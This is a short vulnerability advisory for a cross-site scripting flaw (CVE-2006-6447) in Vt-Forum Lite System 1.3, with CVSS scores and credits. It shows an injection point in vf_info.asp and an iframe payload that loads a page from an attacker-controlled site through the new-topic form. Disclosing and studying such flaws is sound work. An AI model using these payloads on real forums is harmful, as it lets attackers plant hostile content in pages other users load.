Vt-Forum Lite System V.1.3 Xss Vuln.

2006.12.11

Credit: St@rExT

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2006-6447

CWE: CWE-Other

CVSS Base Score: 6.8/10

Impact Subscore: 6.4/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

# LiderHack.Org

# script name : Vt-Forum Lite System V.1.3

# Script Download : http://aspindir.com/indir.asp?id=585

# Risk : High

# Found By : St@rExT

# Thanks : Dekolax , ShaFuck31 , ST@ReXT , Dekolax , Swat_Hack , Maverick , Candark , Torlaq , Woheras , Siruas

# Vulnerable file : vf_info.asp

# XSS Bug:

http://target.com/[scriptpath]/vf_info.asp?StrMes=[xss]

# Newtopic Sender  http://target.com/[scriptpath]/vf_newtopic.asp

<iframe height=500 src="http://yoursite/yoursite.html">

Submit

# E-mail: Starext (at) msn (dot) com [email concealed]

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Vt-Forum Lite System V.1.3 Xss Vuln.

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.